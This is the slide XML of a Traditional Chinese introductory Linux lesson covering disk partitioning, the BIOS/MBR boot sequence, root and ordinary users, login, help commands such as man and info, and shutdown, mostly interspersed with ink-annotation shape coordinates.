              <a:rPr lang="zh-TW" altLang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>號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， </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" dirty="0" smtClean="0"/>
              <a:t>SATA</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>硬碟則有</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" dirty="0" smtClean="0"/>
              <a:t>11</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>個邏輯分割</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" dirty="0" smtClean="0"/>
              <a:t>(5</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>號到</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" dirty="0" smtClean="0"/>
              <a:t>15</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>號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。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1060560" y="1434960"/>
              <a:ext cx="812880" cy="450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44720" y="1371600"/>
                <a:ext cx="844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394000" y="1511280"/>
              <a:ext cx="1117800" cy="1400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78160" y="1447920"/>
                <a:ext cx="114948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975120" y="1486080"/>
              <a:ext cx="1054440" cy="763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959280" y="1422360"/>
                <a:ext cx="108612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733920" y="1955880"/>
              <a:ext cx="2070360" cy="12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718080" y="1892160"/>
                <a:ext cx="21020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984240" y="1790640"/>
              <a:ext cx="90216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68400" y="1727280"/>
                <a:ext cx="9338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394000" y="1930320"/>
              <a:ext cx="959040" cy="259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78160" y="1866960"/>
                <a:ext cx="9907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838080" y="2324160"/>
              <a:ext cx="3258000" cy="702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22240" y="2260440"/>
                <a:ext cx="328968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920880" y="3238560"/>
              <a:ext cx="419400" cy="129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05040" y="3174840"/>
                <a:ext cx="4510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063880" y="3270240"/>
              <a:ext cx="43200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48040" y="3206880"/>
                <a:ext cx="4636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6496200" y="3257640"/>
              <a:ext cx="107964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480000" y="3193920"/>
                <a:ext cx="11116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8178840" y="3257640"/>
              <a:ext cx="432000" cy="648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8163000" y="3193920"/>
                <a:ext cx="4636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870120" y="3613320"/>
              <a:ext cx="812880" cy="190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53920" y="3549600"/>
                <a:ext cx="8449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114640" y="3587760"/>
              <a:ext cx="2953080" cy="18468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098800" y="3524400"/>
                <a:ext cx="298476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928800" y="4071960"/>
              <a:ext cx="1150560" cy="10728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912960" y="4008240"/>
                <a:ext cx="1182240" cy="23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2521800" y="4107600"/>
              <a:ext cx="514800" cy="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2505960" y="4044240"/>
                <a:ext cx="5464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3293280" y="4143240"/>
              <a:ext cx="2264760" cy="3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277440" y="4079880"/>
                <a:ext cx="2296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2171520" y="3643200"/>
              <a:ext cx="2415240" cy="17892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2155680" y="3579840"/>
                <a:ext cx="2446920" cy="30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6736680" y="3228840"/>
              <a:ext cx="700200" cy="3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720840" y="3165480"/>
                <a:ext cx="7318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5829120" y="1892880"/>
              <a:ext cx="1622160" cy="75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813280" y="1829520"/>
                <a:ext cx="16538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2243160" y="1971720"/>
              <a:ext cx="664560" cy="40752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2227320" y="1908000"/>
                <a:ext cx="696600" cy="53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2471760" y="1928880"/>
              <a:ext cx="71640" cy="30024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2455920" y="1865160"/>
                <a:ext cx="103320" cy="42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914400" y="2854080"/>
              <a:ext cx="1038960" cy="720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98560" y="2790720"/>
                <a:ext cx="10706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2455920" y="2860920"/>
              <a:ext cx="26280" cy="36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440080" y="2797200"/>
                <a:ext cx="57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8" name="筆跡 27"/>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="2449440" y="2854080"/>
              <a:ext cx="1228320" cy="720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2433600" y="2790720"/>
                <a:ext cx="12600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9" name="筆跡 28"/>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="4604760" y="2847600"/>
              <a:ext cx="1176120" cy="36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588920" y="2784240"/>
                <a:ext cx="1207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0" name="筆跡 29"/>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="2129400" y="3318120"/>
              <a:ext cx="908280" cy="360"/>
            </p14:xfrm>
          </p:contentPart>
        </mc:Choice>
        <mc:Fallback xmlns="">
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="30" name="筆跡 29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2113560" y="3254400"/>
                <a:ext cx="939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筆跡 30"/>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="6864480" y="3219840"/>
              <a:ext cx="555480" cy="360"/>
            </p14:xfrm>
          </p:contentPart>
        </mc:Choice>
        <mc:Fallback xmlns="">
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="31" name="筆跡 30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6848640" y="3156480"/>
                <a:ext cx="5871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2" name="筆跡 31"/>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="8249400" y="3259080"/>
              <a:ext cx="346320" cy="6840"/>
            </p14:xfrm>
          </p:contentPart>
        </mc:Choice>
        <mc:Fallback xmlns="">
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="32" name="筆跡 31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8233200" y="3195720"/>
                <a:ext cx="3783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3" name="筆跡 32"/>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="1103760" y="3664080"/>
              <a:ext cx="359640" cy="360"/>
            </p14:xfrm>
          </p:contentPart>
        </mc:Choice>
        <mc:Fallback xmlns="">
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="33" name="筆跡 32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1087920" y="3600720"/>
                <a:ext cx="3913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34" name="筆跡 33"/>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="2997360" y="2425680"/>
              <a:ext cx="978120" cy="51120"/>
            </p14:xfrm>
          </p:contentPart>
        </mc:Choice>
        <mc:Fallback xmlns="">
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="34" name="筆跡 33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2981160" y="2362320"/>
                <a:ext cx="10101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35" name="筆跡 34"/>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="2349360" y="2844720"/>
              <a:ext cx="3607200" cy="13320"/>
            </p14:xfrm>
          </p:contentPart>
        </mc:Choice>
        <mc:Fallback xmlns="">
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="35" name="筆跡 34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2333520" y="2781360"/>
                <a:ext cx="36388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36" name="筆跡 35"/>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="4305240" y="4019400"/>
              <a:ext cx="756000" cy="13320"/>
            </p14:xfrm>
          </p:contentPart>
        </mc:Choice>
        <mc:Fallback xmlns="">
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="36" name="筆跡 35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4289400" y="3956040"/>
                <a:ext cx="78768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194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練習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切割</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>3</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>個主要分割磁碟區，一個延伸分割區</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>在分成</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>3</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>個</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>邏輯區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9218" name="Picture 2" descr="D:\02教案\105年修訂-20160323修\教案撰寫參考資料\Ben\IMAG065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78" t="3021" r="26676" b="62273"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="-9680" y="2708920"/>
            <a:ext cx="9144000" cy="3733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D:\02教案\105年修訂-20160323修\教案撰寫參考資料\Ben\IMAG065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78" t="52052" r="26676" b="11185"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="439" y="7029400"/>
            <a:ext cx="9144000" cy="3955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6450840" y="3236040"/>
              <a:ext cx="857520" cy="75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35000" y="3172680"/>
                <a:ext cx="88920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5393520" y="4957560"/>
              <a:ext cx="829080" cy="147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77680" y="4894200"/>
                <a:ext cx="86076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6479280" y="4914720"/>
              <a:ext cx="586080" cy="72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463440" y="4851360"/>
                <a:ext cx="61812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7593840" y="4843440"/>
              <a:ext cx="779040" cy="1144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578000" y="4779720"/>
                <a:ext cx="81072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6243480" y="3971880"/>
              <a:ext cx="586440" cy="3502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227640" y="3908160"/>
                <a:ext cx="618120" cy="47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6807960" y="4021920"/>
              <a:ext cx="743400" cy="550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792120" y="3958200"/>
                <a:ext cx="775080" cy="67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筆跡 11"/>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="7558200" y="3929040"/>
              <a:ext cx="329040" cy="2646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42360" y="3865320"/>
                <a:ext cx="360720" cy="39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筆跡 12"/>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="7794000" y="4122000"/>
              <a:ext cx="314640" cy="72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777800" y="4058280"/>
                <a:ext cx="34668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筆跡 13"/>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="7636680" y="4128840"/>
              <a:ext cx="236160" cy="7362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620840" y="4065480"/>
                <a:ext cx="267840" cy="86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1591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開機流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MOS-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>紀錄各項硬體參數且嵌入於主機板</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>BIOS-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>為寫入在主機板上的韌體，開機時電腦會主動執行的第一個程式，並認識第一個可以開機的程式</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>MBR</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>分割表</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>(64)-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>以磁柱號碼記錄各個磁區</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>MBR(446)-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>可開機管理程式</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>boot loader(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>放在開機磁區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一支可以讀取核心檔案的軟體</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>多種開機的功能</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>核心</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>檔案</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>開啟作業系統的功能</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>開機</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1" smtClean="0"/>
              <a:t>ing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3</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-TW"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="文字方塊 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2188365" y="1758"/>
            <a:ext cx="50191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POST (Power On  Self TEST) </a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US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筆跡 6"/>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="5283360" y="4730760"/>
              <a:ext cx="192420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67160" y="4667400"/>
                <a:ext cx="195624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筆跡 7"/>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="1085760" y="1600200"/>
              <a:ext cx="711720" cy="320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69920" y="1536840"/>
                <a:ext cx="7434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筆跡 8"/>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="914400" y="2120760"/>
              <a:ext cx="749520" cy="1022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98560" y="2057400"/>
                <a:ext cx="78120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筆跡 9"/>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="927000" y="5892840"/>
              <a:ext cx="1029240" cy="446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11160" y="5829480"/>
                <a:ext cx="1060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筆跡 10"/>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="3016080" y="5892840"/>
              <a:ext cx="4032720" cy="108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00240" y="5829480"/>
                <a:ext cx="406440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筆跡 11"/>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="2368440" y="1530360"/>
              <a:ext cx="413280" cy="259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352600" y="1467000"/>
                <a:ext cx="4449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筆跡 12"/>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="4019400" y="1511280"/>
              <a:ext cx="4458240" cy="114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003560" y="1447920"/>
                <a:ext cx="448992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筆跡 13"/>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="2679840" y="2165400"/>
              <a:ext cx="29232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664000" y="2101680"/>
                <a:ext cx="3240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筆跡 14"/>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="3975120" y="2158920"/>
              <a:ext cx="2292840" cy="13392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959280" y="2095560"/>
                <a:ext cx="232452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筆跡 15"/>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="7327800" y="2228760"/>
              <a:ext cx="1587960" cy="511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311960" y="2165400"/>
                <a:ext cx="16196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筆跡 16"/>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="1003320" y="2565360"/>
              <a:ext cx="4584960" cy="8928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987480" y="2502000"/>
                <a:ext cx="46166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筆跡 17"/>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="6934320" y="2139840"/>
              <a:ext cx="1009800" cy="7668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918480" y="2076480"/>
                <a:ext cx="104148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9" name="筆跡 18"/>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="4070520" y="3689280"/>
              <a:ext cx="2883240" cy="1083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054320" y="3625920"/>
                <a:ext cx="291528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0" name="筆跡 19"/>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="6985080" y="3759120"/>
              <a:ext cx="1124280" cy="68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6969240" y="3695760"/>
                <a:ext cx="11559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1" name="筆跡 20"/>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="942840" y="3614760"/>
              <a:ext cx="2715120" cy="15732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27000" y="3551040"/>
                <a:ext cx="2746800" cy="28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3" name="筆跡 22"/>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="5257800" y="4800600"/>
              <a:ext cx="1679040" cy="14328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5241960" y="4736880"/>
                <a:ext cx="1710720" cy="27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4" name="筆跡 23"/>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="3416040" y="4330440"/>
              <a:ext cx="4657320" cy="5256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3400200" y="4266720"/>
                <a:ext cx="46890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5" name="筆跡 24"/>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="1071360" y="4839840"/>
              <a:ext cx="1776600" cy="3312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055160" y="4776120"/>
                <a:ext cx="18086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6" name="筆跡 25"/>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="5492880" y="4794120"/>
              <a:ext cx="2495520" cy="7884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477040" y="4730400"/>
                <a:ext cx="25272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7" name="筆跡 26"/>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="960120" y="5264280"/>
              <a:ext cx="705960" cy="684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944280" y="5200920"/>
                <a:ext cx="7376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6" name="筆跡 5"/>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="2451240" y="2108160"/>
              <a:ext cx="654120" cy="766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435400" y="2044800"/>
                <a:ext cx="68616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2" name="筆跡 21"/>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="2736720" y="5765760"/>
              <a:ext cx="2572200" cy="8280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2720880" y="5702400"/>
                <a:ext cx="2603880" cy="209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4166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2500" dirty="0"/>
              <a:t>Linux</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2500" dirty="0"/>
              <a:t>是一個真正意義上的多用戶、多任務操作系統，用戶要使用該系統，首先必須登錄，使用完系統後，必須退出</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2500" dirty="0" smtClean="0"/>
              <a:t>。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="2500" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2500" dirty="0"/>
              <a:t>Linux</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2500" dirty="0"/>
              <a:t>下有兩類用戶</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2500" dirty="0" smtClean="0"/>
              <a:t>：</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="2500" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2500" dirty="0"/>
              <a:t>root</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2500" dirty="0"/>
              <a:t>用戶：超級用戶，即係統管理員，系統的擁有者，在</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2500" dirty="0"/>
              <a:t>Linux</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2500" dirty="0"/>
              <a:t>系統中有且只有​​一個</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2500" dirty="0"/>
              <a:t>root</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2500" dirty="0"/>
              <a:t>用戶，是對系統的一切都具有完全的訪問權限的用戶，可以在系統中任何操作；並可由它建立多個普通用戶，共同使用該計算機系統。 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2500" dirty="0"/>
              <a:t>root</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2500" dirty="0"/>
              <a:t>用戶的密碼在系統安裝時由安裝者設定。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2500" dirty="0"/>
              <a:t>普通用戶：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2500" dirty="0"/>
              <a:t>Linux</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2500" dirty="0"/>
              <a:t>系統可以創建許多普通用戶，並為其指定相應的權限，使其有限地使用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2500" dirty="0"/>
              <a:t>Linux</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2500" dirty="0"/>
              <a:t>系統。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-TW" altLang="en-US" sz="25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用戶登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831960" y="2654280"/>
              <a:ext cx="2343240" cy="637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6120" y="2590920"/>
                <a:ext cx="23752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155600" y="3168720"/>
              <a:ext cx="1035360" cy="446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39760" y="3105000"/>
                <a:ext cx="10674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143000" y="5518080"/>
              <a:ext cx="959040" cy="259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27160" y="5454720"/>
                <a:ext cx="9910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921040" y="3181320"/>
              <a:ext cx="495720" cy="38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905200" y="3117960"/>
                <a:ext cx="5274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4819680" y="3168720"/>
              <a:ext cx="1060920" cy="637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803840" y="3105000"/>
                <a:ext cx="109260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924360" y="3524400"/>
              <a:ext cx="2337120" cy="1018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908520" y="3460680"/>
                <a:ext cx="2368800" cy="228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673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3400" dirty="0"/>
              <a:t>在圖形界面下</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3400" dirty="0" smtClean="0"/>
              <a:t>登錄</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="3400" dirty="0" smtClean="0"/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圖形登錄方式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5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916832"/>
            <a:ext cx="5976664" cy="4756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7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/>
              <a:t>Linux</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="4400" dirty="0"/>
              <a:t>系統桌面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6</a:t>
            </a:fld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266825"/>
            <a:ext cx="6552728" cy="517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27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應用程序幫助</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3400" dirty="0" smtClean="0"/>
              <a:t>選項</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="3400" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3400" dirty="0" smtClean="0"/>
              <a:t>Man</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3400" dirty="0" smtClean="0"/>
              <a:t>，例</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3400" dirty="0"/>
              <a:t>: man </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3400" dirty="0" err="1"/>
              <a:t>mkdir</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="3400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3400" dirty="0" smtClean="0"/>
              <a:t>Info</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3400" dirty="0" smtClean="0"/>
              <a:t>，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3400" dirty="0"/>
              <a:t>例</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3400" dirty="0"/>
              <a:t>: info </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3400" dirty="0" err="1"/>
              <a:t>rm</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="3400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3400" dirty="0" smtClean="0"/>
              <a:t>Help</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3400" dirty="0" smtClean="0"/>
              <a:t>，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3400" dirty="0"/>
              <a:t>例</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3400" dirty="0"/>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3400" dirty="0" err="1"/>
              <a:t>ls</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3400" dirty="0"/>
              <a:t> --help</a:t>
            </a:r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獲得幫助指令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092240" y="2076480"/>
              <a:ext cx="933840" cy="10188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76400" y="2013120"/>
                <a:ext cx="96552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219480" y="2241720"/>
              <a:ext cx="628920" cy="64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203640" y="2178000"/>
                <a:ext cx="6606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203720" y="2203560"/>
              <a:ext cx="101628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187880" y="2139840"/>
                <a:ext cx="10479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028880" y="2806560"/>
              <a:ext cx="1168560" cy="324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12680" y="2743200"/>
                <a:ext cx="12006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098880" y="2813040"/>
              <a:ext cx="1302120" cy="576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83040" y="2749680"/>
                <a:ext cx="133380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295280" y="3530520"/>
              <a:ext cx="98460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79440" y="3467160"/>
                <a:ext cx="10162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206880" y="3098880"/>
              <a:ext cx="393840" cy="5083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191040" y="3035160"/>
                <a:ext cx="425520" cy="63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759120" y="3403440"/>
              <a:ext cx="857520" cy="514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743280" y="3340080"/>
                <a:ext cx="889560" cy="17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6548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/>
              <a:t>man page</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="內容版面配置區 5" descr="4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043608" y="1412776"/>
            <a:ext cx="6912768" cy="4891105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1555920" y="2063880"/>
              <a:ext cx="3727800" cy="1144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39720" y="2000160"/>
                <a:ext cx="375984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1092240" y="2374920"/>
              <a:ext cx="68616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76400" y="2311560"/>
                <a:ext cx="717840" cy="127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0957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慣用的關機指令： </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>shutdown</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="內容版面配置區 5" descr="5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67544" y="1556792"/>
            <a:ext cx="8424936" cy="3867184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3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3765600" y="4654440"/>
              <a:ext cx="375120" cy="3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49760" y="4591080"/>
                <a:ext cx="406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4495680" y="4521240"/>
              <a:ext cx="3074040" cy="892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79840" y="4457880"/>
                <a:ext cx="310572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4178160" y="4584600"/>
              <a:ext cx="317880" cy="38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162320" y="4521240"/>
                <a:ext cx="3495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4152960" y="4584600"/>
              <a:ext cx="152640" cy="194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137120" y="4521240"/>
